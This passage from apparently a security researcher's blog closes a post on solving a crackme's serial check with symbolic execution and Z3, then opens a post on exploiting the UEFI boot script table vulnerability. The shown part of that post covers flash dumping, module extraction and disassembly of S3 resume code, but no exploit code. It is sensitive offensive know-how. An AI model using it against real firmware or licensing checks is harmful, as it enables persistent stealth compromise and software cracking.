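}

# (destination, operator, left operand, right operand), copied from the trace
TRACE = [
    ('V_02_40110b_1_0', '>>', 'R_EDX_4010ff_1_0', 0x1f),
    ('V_04_40110b_3_0', '<<', 'R_EDX_4010ff_1_0', 0x1),
    ('R_EDX_40110b_4_0', '|', 'V_04_40110b_3_0', 'V_02_40110b_1_0'),
]

def replay(trace, env):
    """Evaluate SSA assignments in order; string operands are looked up in env."""
    env = dict(env)
    for dst, op, a, b in trace:
        a = env[a] if isinstance(a, str) else a
        b = env[b] if isinstance(b, str) else b
        env[dst] = OPS[op](a, b) & MASK32
    return env

env = replay(TRACE, {'R_EDX_4010ff_1_0': 0x80000001})
print(hex(env['R_EDX_40110b_4_0']))   # rol(0x80000001, 1), prints 0x3
```

Each name is assigned exactly once, so the entries can be turned into equalities one by one, which is what makes this form convenient as solver input.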

Now let's write the main function that connects all of the pieces together:
def keygen(kao_binary_path, kao_installation_ID):

    # address of the check_serial() function
    check_serial = 0x004010EC       

    # address of the lstrcmpA() call inside check_serial()
    stop_at = 0x0040111D

    # address of the global buffer with installation ID
    installation_ID = 0x004093A8        

    # load Kao's PE binary
    from pyopenreil.utils import bin_PE        
    tr = CodeStorageTranslator(bin_PE.Reader(kao_binary_path))

    # Construct DFG, run all available code optimizations
    # and update storage with new function code.
    dfg = DFGraphBuilder(tr).traverse(check_serial)
    dfg.optimize_all(tr.storage)        

    print tr.get_func(check_serial)

    # create CPU and ABI
    cpu = Cpu(ARCH_X86)
    abi = VM.Abi(cpu, tr, no_reset = True)   

    # hardcoded ciphered text constant from Kao's binary
    out_data = '0how4zdy81jpe5xfu92kar6cgiq3lst7'
    in_data = ''

    try:

        # convert installation ID into the binary form
        for s in kao_installation_ID.split('-'):
        
            # '<L' is always a 4-byte little-endian value, unlike native 'L'
            in_data += struct.pack('<L', int(s[:8], 16))
            in_data += struct.pack('<L', int(s[8:], 16))

        assert len(in_data) == 32

    except:

        raise Exception('Invalid installation ID string')

    # copy installation ID into the emulator's memory
    for i in range(32):

        cpu.mem.store(installation_ID + i, U8, 
            cpu.mem._Val(U8, 0, ord(in_data[i])))

    ret, ebp = 0x41414141, 0x42424242

    # create stack with symbolic arguments for check_serial()
    stack = abi.pushargs(( Val(exp = SymVal('ARG_0', U32)), \
                           Val(exp = SymVal('ARG_1', U32)) ))

    # dummy return address
    stack.push(Val(ret))

    # initialize emulator's registers
    cpu.reg('ebp', Val(ebp))
    cpu.reg('esp', Val(stack.top))

    # run until stop
    try: cpu.run(tr, check_serial, stop_at = [ stop_at ])
    except VM.CpuStop as e:            

        print 'STOP at', hex(cpu.reg('eip').get_val())
            
        # get Z3 expressions list for current CPU state
        state = cpu.to_z3()
        cpu.dump(show_all = True)                

        # read symbolic expressions for contents of the output buffer
        addr = cpu.reg('eax').val
        data = cpu.mem.read(addr.val, 32)
        
        for i in range(32):

            print '*' + hex(addr.val + i), '=', data[i].exp                  

        # create SMT solver
        solver = z3.Solver()

        for i in range(32):

            # add constraint for each output byte
            solver.add(data[i].to_z3(state, U8) == z3.BitVecVal(ord(out_data[i]), 8))
        
        # solve constraints
        solver.check()

        # get solution
        model = solver.model()

        # get and print serial number
        serial = map(lambda d: model[d].as_long(), model.decls())
        serial[1] = serial[0] ^ serial[1]

        print '\nSerial number: %s\n' % '-'.join([ '%.8X' % serial[0], 
                                                   '%.8X' % serial[1] ])

        return serial

    assert False
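
The input and output formats of keygen() can be tested separately from the emulator. Here is a small Python 3 sketch of both conversions; parse_installation_id and format_serial are hypothetical helper names. It uses the '<L' format because the native 'L' format is 8 bytes wide on most 64-bit Unix builds of Python, which would break the 32-byte length check.

```python
import struct

def parse_installation_id(text):
    """Convert 4 dash-separated groups of 16 hex digits into 32 bytes."""
    data = b''
    for group in text.split('-'):
        # each group holds two 32-bit words stored in little-endian order
        data += struct.pack('<L', int(group[:8], 16))
        data += struct.pack('<L', int(group[8:], 16))
    if len(data) != 32:
        raise ValueError('Invalid installation ID string')
    return data

def format_serial(first, second):
    """Format two 32-bit words the same way keygen() prints the serial."""
    return '%.8X-%.8X' % (first, second)

data = parse_installation_id(
    '97FF58287E87FB74-979950C854E3E8B3-55A3F121A5590339-6A8DF5ABA981F7CE')
print(len(data), data[:8].hex())
print(format_serial(0x1, 0xdeadbeef))
```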

My quick and dirty symbolic execution engine isn't perfect; it has certain limitations that make it unusable for any complex application: an incomplete memory model and a very simple symbolic CPU that doesn't support things like memory writes and jumps with a symbolic address, jumps with a symbolic condition, etc. Currently I have included it in the OpenREIL source code tree only as a unit test and a standalone test application, but I'm planning to make a proper symbolic execution implementation and API for pyopenreil as well.

To use this keygen you need to build OpenREIL from the Git repository, install Microsoft Z3 with Python bindings and run the tests/test_kao.py program with your Kao's installation ID as an argument:
$ python tests/test_kao.py 97FF58287E87FB74-979950C854E3E8B3-55A3F121A5590339-6A8DF5ABA981F7CE


And win!

It took around one second to perform all of the computations, which is very good.

A curious reader will probably ask: is it possible to crack any more or less strong real-world crypto algorithm (like AES, for example ☺) in this way? Unfortunately no, SMT solvers are not magic artefacts and they can't bend the laws of mathematics.

Friday, February 6, 2015

Exploiting UEFI boot script table vulnerability

Around one month ago, at 31-st Chaos Communication Congress, Rafal Wojtczuk and Corey Kallenberg presented an excellent research: "Attacks on UEFI security, inspired by Darth Venamis's misery and Speed Racer" (video, white paper 1, white paper 2). The main goal of UEFI vulnerabilities discovered by researchers — it's relatively easy way to bypass different platform security measures (BIOS write protection, SMM protection) on wide range of modern motherboards and laptops that available at the market. Usually, such vulnerabilities might be useful at post exploitation phase for infecting a target machine with stealth and persistent BIOS backdoor that can survive operating system reinstallation. Also, disclosed boot script table vulnerability (CERT VU #976132) is very interesting because at this moment it's one of the best publicly known vulnerabilities that allows to get access to the SMM (a high-privileged CPU mode that might be even more powerful, that ring0 or hardware hypervisor).

However, Rafal and Corey haven't released their PoC code which is needed to check your system for UEFI boot script table vulnerability, so, I decided to write a blog post with step by step work log of it's exploitation on my test hardware: Intel DQ77KB motherboard with 7 series Q77 chipset. In theory, all reverse engineering and exploitation steps are also reproducible on any other UEFI compatible motherboard, so you can modify exploit code to add other models support. As for the BIOS_CNTL race condition vulnerability (CERT VU #766164), my motherboard is not vulnerable because it's properly uses SMM_BWP bit.

Also, while reading this post you should remember that by BIOS I usually mean "PC firmware in general", not a legacy (pre-UEFI) BIOS. The described attack is irrelevant to legacy BIOS, because in most cases it doesn't have appropriate platform security mechanisms at all.

General information


The UEFI boot script table is a data structure used to save platform state during ACPI S3 sleep, when most platform components are powered off. Usually this structure is located in a special nonvolatile storage (NVS) memory region. UEFI code constructs the boot script table during normal boot and interprets its entries during S3 resume, when the platform is waking up from sleep. An attacker who is able to modify the current boot script table contents from the kernel mode of the operating system and trigger an S3 suspend-resume cycle can achieve arbitrary code execution at an early platform initialisation stage, when some security features are not initialised or not locked yet. If you haven't seen Rafal and Corey's talk, it's a good time to do that.

Official Intel documentation (Intel® Platform Innovation Framework for EFI) is the best starting point to get some information about UEFI S3 resume architecture:


A lot of things from the documents above have a reference implementation in the EDK2 source code. In practice many manufacturers use their own code, but nevertheless EDK2 is a great source of information that helps to better understand some unclear aspects.

The following scheme shows the platform boot path during normal boot and during S3 resume:

Figure 2-2 from EFI Boot Script Specification.

Firmware reverse engineering is required to exploit this vulnerability because the boot script table location and format are vendor-specific. The Boot Script Specification defines a set of operations that must be implemented by the interpreter, but not the boot script binary format itself:
#define EFI_BOOT_SCRIPT_IO_WRITE_OPCODE                 0x00 
#define EFI_BOOT_SCRIPT_IO_READ_WRITE_OPCODE            0x01 
#define EFI_BOOT_SCRIPT_MEM_WRITE_OPCODE                0x02 
#define EFI_BOOT_SCRIPT_MEM_READ_WRITE_OPCODE           0x03 
#define EFI_BOOT_SCRIPT_PCI_CONFIG_WRITE_OPCODE         0x04 
#define EFI_BOOT_SCRIPT_PCI_CONFIG_READ_WRITE_OPCODE    0x05 
#define EFI_BOOT_SCRIPT_SMBUS_EXECUTE_OPCODE            0x06 
#define EFI_BOOT_SCRIPT_STALL_OPCODE                    0x07 
#define EFI_BOOT_SCRIPT_DISPATCH_OPCODE                 0x08

A real implementation of S3 resume may also have some custom opcodes. Obviously, they are not described in any specs.
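When looking at a dumped table it helps to map opcode bytes back to these names. Here is a minimal sketch in Python; the `opcode_name` helper is hypothetical and only the values come from the list above. Anything outside the standard set is reported as unknown, since vendor opcodes are not covered by the specification:

```python
# Standard opcode values, copied from the Boot Script Specification list above.
BOOT_SCRIPT_OPCODES = {
    0x00: "EFI_BOOT_SCRIPT_IO_WRITE_OPCODE",
    0x01: "EFI_BOOT_SCRIPT_IO_READ_WRITE_OPCODE",
    0x02: "EFI_BOOT_SCRIPT_MEM_WRITE_OPCODE",
    0x03: "EFI_BOOT_SCRIPT_MEM_READ_WRITE_OPCODE",
    0x04: "EFI_BOOT_SCRIPT_PCI_CONFIG_WRITE_OPCODE",
    0x05: "EFI_BOOT_SCRIPT_PCI_CONFIG_READ_WRITE_OPCODE",
    0x06: "EFI_BOOT_SCRIPT_SMBUS_EXECUTE_OPCODE",
    0x07: "EFI_BOOT_SCRIPT_STALL_OPCODE",
    0x08: "EFI_BOOT_SCRIPT_DISPATCH_OPCODE",
}


def opcode_name(opcode):
    """Return the specification name for an opcode byte, or a placeholder."""
    return BOOT_SCRIPT_OPCODES.get(
        opcode, "unknown/vendor-specific (0x%02x)" % opcode
    )
```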

Acquiring and unpacking firmware image


First of all, to reverse engineer the boot script table interpreter we need to obtain a firmware image for the target platform. It’s possible to download firmware updates from the vendor web site and unpack them, but if you don’t want to mess with the firmware update format (which may be proprietary or undocumented), it’s better to dump the actual flash image contents from the SPI flash chip located on the motherboard. In most cases you can dump the flash with the flashrom utility directly from the operating system running on the target platform (the software way). If your chipset or motherboard is not supported by flashrom, like my DQ77KB, you can use another computer to read the flash chip contents with an SPI programmer device (it should work even without de-soldering the chip).

Intel DQ77KB has two different SPI flash chips:


At first I thought that it might be something similar to dual BIOS technology, but actually these chips have different capacities (64 and 32 Mbit) and both of them are used to store a single flash image which is too big to fit into the 64 Mbit chip alone. To work comfortably with such a board, without needing to reconnect the programmer each time to read or write both chips, I decided to use a two-channel FT2232H mini module from FTDI, which has a USB interface and supports a lot of widely used hardware protocols like SPI, UART, I2C and JTAG. The A and B channels of the module are connected to the 1st and 2nd chip respectively:

Chip pin   Board pin, ch. A   Board pin, ch. B

1          CN2.12             CN3.23
2          CN2.09             CN3.24
3          CN2.14             CN3.21
4          CN2.02             CN3.04
5          CN2.10             CN3.25
6          CN2.07             CN3.26
7          CN2.13             CN3.20
8          CN2.05             CN3.01

If you need to read the flash chip only once or a few times, it might be okay to use microprobes or a SOIC-8 test clip to connect to the chip.

Because I pretty often do different kinds of work that require firmware modification and board unbricking, I decided to solder thin МГТФ wires with 8-pin PLS connectors directly to my chips. This setup is much more convenient and solid, and you can keep the board on your desk inside a closed case as usual, without wasting time connecting probes or clips:

1-st chip of DQ77KB connected to FT2232H mini module.
The lit LEDs are a side effect of parasitic power from the programmer.

Flashrom can use an FTDI FT2232/FT4232H/FT232H based device as an external SPI programmer. Let's read the contents of the two chips and join them together:
# flashrom -p ft2232_spi:type=2232H,port=A --read fw.bin

flashrom v0.9.7-r1854 on Linux 3.8.0-44-generic (x86_64)
flashrom is free software, get the source code at http://www.flashrom.org

Calibrating delay loop... OK.
Found Winbond flash chip "W25Q64.V" (8192 kB, SPI) on ft2232_spi.
Reading flash... done.

# flashrom -p ft2232_spi:type=2232H,port=B --read fw_2.bin

flashrom v0.9.7-r1854 on Linux 3.8.0-44-generic (x86_64)
flashrom is free software, get the source code at http://www.flashrom.org

Calibrating delay loop... OK.
Found Winbond flash chip "W25Q32.V" (4096 kB, SPI) on ft2232_spi.
Reading flash... done.

# cat fw_2.bin >> fw.bin && rm fw_2.bin
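The same join can be done with a size sanity check, which catches a truncated read before any parsing starts. This is a minimal sketch in Python, not part of the original workflow: the `join_dumps` helper is hypothetical and the expected size is simply the sum of the two chip sizes reported by flashrom above.

```python
import os

# Chip sizes reported by flashrom above: 8192 kB (W25Q64) + 4096 kB (W25Q32).
EXPECTED_SIZE = (8192 + 4096) * 1024


def join_dumps(first_path, second_path, out_path):
    """Concatenate two chip dumps into one image, return its size in bytes."""
    with open(out_path, "wb") as out:
        for path in (first_path, second_path):
            with open(path, "rb") as chip:
                out.write(chip.read())
    return os.path.getsize(out_path)
```

With separate dump files for the two chips (the names are up to you), the result of `join_dumps()` should be equal to `EXPECTED_SIZE`, that is 12 MiB.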

According to its flash descriptor, the dumped firmware image consists of different regions (BIOS, ME, etc.) that may contain Firmware File System (FFS) volumes. UEFI code is split across modules of different types (PEI stage, DXE stage, SMM code, etc.) that use a subset of the PE/COFF executable format and are stored on FFS as files. On modern motherboards UEFI may contain several hundred PE modules (~250 on my DQ77KB).

To extract these modules we will use the uefi-firmware-parser utility. It's not a perfect tool, but in my case uefi-firmware-parser does its job well after several bug fixes (the program author has already included them in the source). Also, this tool is written in Python, which makes it relatively flexible and easy to modify.
$ cd uefi-firmware-parser
$ python scripts/fv_parser.py --extract --output ./fw_extracted --flash fw.bin

Parsing Flash descriptor.
Flash Descriptor (Intel PCH) chips 1, regions 3, masters 2, PCH straps 18, PROC straps 1, ICC entries 0
  Flash Region type= bios, size= 0x640000 (6553600 bytes) details[ read: 11, write: 10, base: 1472, limit: 3071, id: 0 ]
    Firmware Volume: 8c8ce578-8a3d-4f1c-3599-896185c32dd3 attr 0x0003feff, rev 2, cksum 0xe6ae, size 0x20000 (131072 bytes)
      Firmware Volume Blocks:  (32, 0x1000)
      File 0: cef5b9a3-476d-497f-dc9f-e98143e0422c type 0x01, attr 0x00, state 0x0f, size 0x1ffb8 (131000 bytes), (raw)
        RawObject: size= 130976
    Firmware Volume: 8c8ce578-8a3d-4f1c-3599-896185c32dd3 attr 0x0003feff, rev 2, cksum 0xe6ae, size 0x20000 (131072 bytes)
      Firmware Volume Blocks:  (32, 0x1000)
      File 0: cef5b9a3-476d-497f-dc9f-e98143e0422c type 0x01, attr 0x00, state 0x07, size 0x1ffb8 (131000 bytes), (raw)
        RawObject: size= 130976
    Firmware Volume: 8c8ce578-8a3d-4f1c-3599-896185c32dd3 attr 0x0003feff, rev 2, cksum 0xe648, size 0x80000 (524288 bytes)
      Firmware Volume Blocks:  (128, 0x1000)
      File 0: a6beb857-b370-40fb-eb8e-df17aacd955f type 0x02, attr 0x00, state 0x07, size 0x926a (37482 bytes), (freeform)
        Section 0: type 0x01, size 0x9252 (37458 bytes) (Compression section)
          Section 0: type 0x19, size 0x9864 (39012 bytes) (Raw section)
      File 1: 918e7ad1-c1fa-474e-ed82-356dd84f3795 type 0x02, attr 0x00, state 0x07, size 0x7182 (29058 bytes), (freeform)
        Section 0: type 0x01, size 0x716a (29034 bytes) (Compression section)
          Section 0: type 0x19, size 0x76b8 (30392 bytes) (Raw section)
      File 2: ed10cbd0-ec4d-412e-e080-e541edc805f7 type 0x02, attr 0x00, state 0x07, size 0x506a (20586 bytes), (freeform)
        Section 0: type 0x01, size 0x5052 (20562 bytes) (Compression section)
          Section 0: type 0x19, size 0x53ed (21485 bytes) (Raw section)
    Firmware Volume: 8c8ce578-8a3d-4f1c-3599-896185c32dd3 attr 0x0003feff, rev 2, cksum 0xe648, size 0x80000 (524288 bytes)
      Firmware Volume Blocks:  (128, 0x1000)
      File 0: 17088572-377f-44ef-4e8f-b09fff46a070 (CPU_MICROCODE_FILE_GUID) type 0x01, attr 0x48, state 0x07, size 0xa018 (40984 bytes), (raw)
        RawObject: size= 40960
      File 1: 3b42ef57-16d3-44cb-3286-9fdb06b41451 (DELL_MEMORY_INIT_GUID) type 0x06, attr 0x40, state 0x07, size 0x272fc (160508 bytes), (pei module)
        Section 0: type 0x1b, size 0x100 (256 bytes) (PEI dependency expression section)
        Section 1: type 0x10, size 0x271e4 (160228 bytes) (PE32 image section)
      File 2: 7fd38521-7798-41e5-5e81-12e01fe23c11 type 0x06, attr 0x40, state 0x07, size 0x3cf9 (15609 bytes), (pei module)
        Section 0: type 0x1b, size 0x3a (58 bytes) (PEI dependency expression section)
        Section 1: type 0x01, size 0x3ca5 (15525 bytes) (Compression section)
          Section 0: type 0x10, size 0x8924 (35108 bytes) (PE32 image section)
      File 3: 70c2051d-5956-4466-39b1-9e1346f9de0c type 0x06, attr 0x40, state 0x07, size 0x3790 (14224 bytes), (pei module)
        Section 0: type 0x1b, size 0x3a (58 bytes) (PEI dependency expression section)
        Section 1: type 0x01, size 0x373c (14140 bytes) (Compression section)
          Section 0: type 0x10, size 0x5964 (22884 bytes) (PE32 image section)
      File 4: dc292e2e-d532-4eb7-2f83-3068d7f5951e type 0x06, attr 0x40, state 0x07, size 0x7dc (2012 bytes), (pei module)
        Section 0: type 0x1b, size 0x5e (94 bytes) (PEI dependency expression section)
        Section 1: type 0x10, size 0x764 (1892 bytes) (PE32 image section)
      File 5: 078f54d4-cc22-4048-949e-879c214d562f type 0xf0, attr 0x00, state 0x07, size 0x47010 (290832 bytes), (ffs padding)
      File 6: 1ba0062e-c779-4582-6685-336ae8f78f09 (EFI_FFS_VOLUME_TOP_FILE_GUID) type 0x02, attr 0x40, state 0x07, size 0x20 (32 bytes), (freeform)
        Section 0: type 0x19, size 0x8 (8 bytes) (Raw section)
    Firmware Volume: 8c8ce578-8a3d-4f1c-3599-896185c32dd3 attr 0x0003feff, rev 2, cksum 0xe1c4, size 0x4c0000 (4980736 bytes)
      Firmware Volume Blocks:  (1216, 0x1000)
      File 0: 5c266089-e103-4d43-b59a-12d7095be2af type 0x07, attr 0x40, state 0x07, size 0xa2a (2602 bytes), (driver)
        Section 0: type 0x13, size 0x28 (40 bytes) (DXE dependency expression section)
        Section 1: type 0x01, size 0x9ea (2538 bytes) (Compression section)
          Section 0: type 0x10, size 0x12c4 (4804 bytes) (PE32 image section)
      File 1: 5bba83e6-f027-4ca7-d0bf-16358cc9e123 type 0x07, attr 0x40, state 0x07, size 0xac3c (44092 bytes), (driver)
        Section 0: type 0x10, size 0xac24 (44068 bytes) (PE32 image section)
      File 2: 8d59ebc8-b85e-400e-0a97-1f995d1db91e type 0x07, attr 0x40, state 0x07, size 0xa9dc (43484 bytes), (driver)
        Section 0: type 0x10, size 0xa9c4 (43460 bytes) (PE32 image section)
      File 3: eb969dee-3ca7-482e-7589-ef8d9f160dd1 type 0x07, attr 0x40, state 0x07, size 0x8ba (2234 bytes), (driver)
        Section 0: type 0x13, size 0x16 (22 bytes) (DXE dependency expression section)
        Section 1: type 0x01, size 0x88a (2186 bytes) (Compression section)
          Section 0: type 0x10, size 0x10c4 (4292 bytes) (PE32 image section)
      File 4: f918e883-7c0f-444c-0ba7-a73350112689 type 0x07, attr 0x40, state 0x07, size 0xbdb (3035 bytes), (driver)
        Section 0: type 0x13, size 0x16 (22 bytes) (DXE dependency expression section)
        Section 1: type 0x01, size 0xbab (2987 bytes) (Compression section)
          Section 0: type 0x10, size 0x1704 (5892 bytes) (PE32 image section)
      File 5: e03abadf-e536-4e88-a0b3-b77f78eb34fe (DELL_CPU_DXE_GUID) type 0x07, attr 0x40, state 0x07, size 0x1883 (6275 bytes), (driver)
        Section 0: type 0x13, size 0x6 (6 bytes) (DXE dependency expression section)
        Section 1: type 0x01, size 0x1863 (6243 bytes) (Compression section)
          Section 0: type 0x10, size 0x2d24 (11556 bytes) (PE32 image section)
      File 6: 93022f8c-1f09-47ef-b2bb-5814ff609df5 (DELL_FILE_SYSTEM_GUID) type 0x07, attr 0x40, state 0x07, size 0x46c1 (18113 bytes), (driver)
        Section 0: type 0x01, size 0x46a9 (18089 bytes) (Compression section)
          Section 0: type 0x10, size 0x7e04 (32260 bytes) (PE32 image section)
      File 7: dac2b117-b5fb-4964-12a3-0dcc77061b9b (FONT_FFS_FILE_GUID) type 0x02, attr 0x40, state 0x07, size 0x5a5 (1445 bytes), (freeform)
        Section 0: type 0x01, size 0x58d (1421 bytes) (Compression section)
          Section 0: type 0x18, size 0xfc4 (4036 bytes) (Free-form GUID section)
      File 8: 9221315b-30bb-46b5-3e81-1b1bf4712bd3 (SETUP_DEFAULTS_FFS_GUID) type 0x02, attr 0x40, state 0x07, size 0x178 (376 bytes), (freeform)
        Section 0: type 0x01, size 0x160 (352 bytes) (Compression section)
          Section 0: type 0x19, size 0x2c4 (708 bytes) (Raw section)
      File 9: 5ae3f37e-4eae-41ae-4082-35465b5e81eb (DELL_CORE_DXE_GUID) type 0x05, attr 0x40, state 0x07, size 0x27b15 (162581 bytes), (dxe core)
        Section 0: type 0x01, size 0x27afd (162557 bytes) (Compression section)
          Section 0: type 0x10, size 0x152a44 (1387076 bytes) (PE32 image section)
          Section 1: type 0x18, size 0xc53 (3155 bytes) (Free-form GUID section)

... around 300 other FFS files were skipped

As an alternative to uefi-firmware-parser you may also have a look at UEFITool, a Qt-based utility that runs on Windows, OS X and Linux.
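The BIOS region line in the parser output above can be cross-checked by hand. The base and limit fields of an Intel flash descriptor region count 4 KiB blocks, and the limit is inclusive. A small sketch of the arithmetic (the `region_range` helper is only an illustration, not part of uefi-firmware-parser):

```python
FLASH_BLOCK_SIZE = 0x1000  # descriptor base/limit fields count 4 KiB blocks


def region_range(base, limit):
    """Return (start offset, size in bytes) of a flash descriptor region."""
    start = base * FLASH_BLOCK_SIZE
    end = (limit + 1) * FLASH_BLOCK_SIZE  # the limit block is inclusive
    return start, end - start


start, size = region_range(1472, 3071)
print(hex(start), hex(size))  # 0x5c0000 0x640000
```

The size matches the 0x640000 bytes reported by the parser, and the region ends at 0xC00000, exactly the 12 MiB of the two joined chip dumps.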

The original description of the attack mentions EFI_PEI_S3_RESUME_PPI, the EFI interface that implements ACPI boot script handling. The GUID value for this interface is 4426CCB2-E684-4a8a-ae40-20d4b025b710. Let’s search for its raw binary representation inside the UEFI modules that were extracted from the firmware:
$ for s in `find ./fw_extracted -type d`; \
do grep -obUaP '\xb2\xcc\x26\x44\x84\xe6\x8a\x4a' $s/*; \
done | grep '\.pe' | awk -F: '{print $1, $2}'

./fw_extracted/regions/region-bios/volume-volume/file-92685943-d810-47ff-12a1-cc8490776a1f/section0.pe 49160
./fw_extracted/regions/region-bios/volume-volume/file-efd652cc-0e99-40f0-c096-e08c089070fc/section1.pe 5408

This GUID is present in only two files: file-efd652cc-0e99-40f0-c096-e08c089070fc/section1.pe and file-92685943-d810-47ff-12a1-cc8490776a1f/section0.pe. According to the uefi-firmware-parser output, both of them are UEFI PEI (Pre-EFI Initialisation) executable images, so we have to look inside them with IDA.
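The byte pattern in the grep command is the in-memory form of the GUID: the first three fields are stored little-endian, the last eight bytes are stored as written (the pattern above uses only the first eight bytes). A minimal Python sketch of the same search, using the standard `uuid` module; the helper names are hypothetical:

```python
import uuid


def guid_bytes(guid_string):
    """Return the 16-byte in-memory (EFI_GUID) layout of a textual GUID."""
    return uuid.UUID(guid_string).bytes_le


def find_guid(data, guid_string):
    """Return all offsets at which the GUID occurs in a bytes object."""
    needle = guid_bytes(guid_string)
    offsets = []
    pos = data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets
```

Calling `find_guid()` on the contents of an extracted .pe file with the GUID string from the text should report the same offsets as grep does.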

PEI introduction


Before we start, let’s learn several key concepts that are required for disassembling and understanding UEFI PEI stage code.

The PEI Foundation API is described by the EFI_PEI_SERVICES structure. Usually the runtime passes the address of this structure to the entry point function of each PEI module (PEIM) loaded from FFS. Here is the definition of this structure with descriptions of its functions:
typedef struct _EFI_PEI_SERVICES 
{
  EFI_TABLE_HEADER               Hdr;                // Table header.
  EFI_PEI_INSTALL_PPI            InstallPpi;         // Installs an interface.
  EFI_PEI_REINSTALL_PPI          ReInstallPpi;       // Reinstalls an interface.
  EFI_PEI_LOCATE_PPI             LocatePpi;          // Locates installed interface by GUID.
  EFI_PEI_NOTIFY_PPI             NotifyPpi;          // Installs notification service for interface
                                                     // installation and reinstallation.

  EFI_PEI_GET_BOOT_MODE          GetBootMode;        // Returns the present value of the boot mode.
  EFI_PEI_SET_BOOT_MODE          SetBootMode;        // Sets the value of the boot mode.
  EFI_PEI_GET_HOB_LIST           GetHobList;         // Get Hand-Off Blocks (HOBs) list pointer.
  EFI_PEI_CREATE_HOB             CreateHob;          // Abstracts the creation of HOB headers.
  EFI_PEI_FFS_FIND_NEXT_VOLUME   FfsFindNextVolume;  // Discovers instances of firmware volumes.
  EFI_PEI_FFS_FIND_NEXT_FILE     FfsFindNextFile;    // Discovers instances of firmware files.
  EFI_PEI_FFS_FIND_SECTION_DATA  FfsFindSectionData; // Discovers sections of a given type inside
                                                     // a firmware file.

  EFI_PEI_INSTALL_PEI_MEMORY     InstallPeiMemory;   // Registers the found memory configuration.
  EFI_PEI_ALLOCATE_PAGES         AllocatePages;      // Allocates memory ranges.
  EFI_PEI_ALLOCATE_POOL          AllocatePool;       // Allocates memory from the HOB heap.
  EFI_PEI_COPY_MEM               CopyMem;            // Copies the contents of one buffer to another.
  EFI_PEI_SET_MEM                SetMem;             // Fills a buffer with a specified value.
  EFI_PEI_REPORT_STATUS_CODE     ReportStatusCode;   // Provides an interface that a PEIM can call
                                                     // to report a status code.
                                                    
  EFI_PEI_RESET_SYSTEM           ResetSystem;        // Resets the entire platform.
  EFI_PEI_CPU_IO_PPI             *CpuIo;             // Provides an interface for I/O transactions.
  EFI_PEI_PCI_CFG_PPI            *PciCfg;            // Provides an interface for PCI configuration
                                                     // transactions.
} EFI_PEI_SERVICES;
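The layout of this table matters when reading disassembly, because PEIMs call services through fixed offsets from the table base. Below is a minimal sketch in Python that rebuilds the layout with `ctypes`, assuming a 32-bit PEI phase (so every member after the header is a 4-byte pointer) and the standard 24-byte EFI_TABLE_HEADER. The `service_at` helper is hypothetical:

```python
import ctypes


class EFI_TABLE_HEADER(ctypes.Structure):
    _fields_ = [
        ("Signature", ctypes.c_uint64),
        ("Revision", ctypes.c_uint32),
        ("HeaderSize", ctypes.c_uint32),
        ("CRC32", ctypes.c_uint32),
        ("Reserved", ctypes.c_uint32),
    ]


# Member names in the order of the structure definition above.
SERVICE_NAMES = [
    "InstallPpi", "ReInstallPpi", "LocatePpi", "NotifyPpi",
    "GetBootMode", "SetBootMode", "GetHobList", "CreateHob",
    "FfsFindNextVolume", "FfsFindNextFile", "FfsFindSectionData",
    "InstallPeiMemory", "AllocatePages", "AllocatePool",
    "CopyMem", "SetMem", "ReportStatusCode", "ResetSystem",
    "CpuIo", "PciCfg",
]


class EFI_PEI_SERVICES(ctypes.Structure):
    # Assumption: 32-bit code, so each member is modelled as a 4-byte value.
    _fields_ = [("Hdr", EFI_TABLE_HEADER)] + [
        (name, ctypes.c_uint32) for name in SERVICE_NAMES
    ]


def service_at(offset):
    """Return the name of the service located at a given table offset."""
    for name in SERVICE_NAMES:
        if getattr(EFI_PEI_SERVICES, name).offset == offset:
            return name
    return None


print(service_at(0x18))  # InstallPpi
```

So an indirect call through offset 18h of the table is InstallPpi(), and offset 20h is LocatePpi().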

PEIMs can use the InstallPpi() function to install a PEIM-to-PEIM Interface (PPI) into the PPI database, where it is identified by its GUID:
typedef struct _EFI_PEI_PPI_DESCRIPTOR
{
  UINTN    Flags; // Interface flags.
  EFI_GUID *Guid; // Interface GUID.
  VOID     *Ppi;  // Pointer to the interface-specific structure.

} EFI_PEI_PPI_DESCRIPTOR;

typedef
EFI_STATUS
(EFIAPI * EFI_PEI_INSTALL_PPI)(
  IN struct _EFI_PEI_SERVICES **PeiServices,
  IN EFI_PEI_PPI_DESCRIPTOR   *PpiList // List of the interfaces to install.
);

PEIMs can also use the LocatePpi() function to find an existing interface (it can be implemented by the same PEIM or by another one) by its GUID:
typedef
EFI_STATUS
(EFIAPI * EFI_PEI_LOCATE_PPI)(
  IN     struct _EFI_PEI_SERVICES **PeiServices,
  IN     EFI_GUID                 *Guid,
  IN     UINTN                    Instance,
  IN OUT EFI_PEI_PPI_DESCRIPTOR   **PpiDescriptor,
  IN OUT VOID                     **Ppi
);

Reverse engineering of S3 resume code


Let’s load the FFS file file-efd652cc-0e99-40f0-c096-e08c089070fc/section1.pe into IDA and check the code around its module entry point:
.text:FFBB54EE                 public EntryPoint
.text:FFBB54EE EntryPoint      proc near
.text:FFBB54EE
.text:FFBB54EE arg_0           = dword ptr  4
.text:FFBB54EE arg_4           = dword ptr  8
.text:FFBB54EE
.text:FFBB54EE                 push    esi
.text:FFBB54EF                 mov     esi, [esp+4+arg_4]
.text:FFBB54F3                 push    esi
.text:FFBB54F4                 push    [esp+8+arg_0]
.text:FFBB54F8                 call    sub_FFBB5D9C
.text:FFBB54FD                 mov     eax, [esi]
.text:FFBB54FF                 push    offset unk_FFBB64C8
.text:FFBB5504                 push    esi
.text:FFBB5505                 call    dword ptr [eax+18h]
.text:FFBB5508                 add     esp, 10h
.text:FFBB550B                 pop     esi
.text:FFBB550C                 retn
.text:FFBB550C EntryPoint      endp

.text:FFBB5D9C sub_FFBB5D9C    proc near
.text:FFBB5D9C
.text:FFBB5D9C arg_4           = dword ptr  8
.text:FFBB5D9C
.text:FFBB5D9C                 mov     eax, [esp+arg_4]
.text:FFBB5DA0                 mov     ecx, [eax]
.text:FFBB5DA2                 push    offset unk_FFBB6558
.text:FFBB5DA7                 push    eax
.text:FFBB5DA8                 call    dword ptr [ecx+18h]
.text:FFBB5DAB                 pop     ecx
.text:FFBB5DAC                 pop     ecx
.text:FFBB5DAD                 retn
.text:FFBB5DAD sub_FFBB5D9C    endp

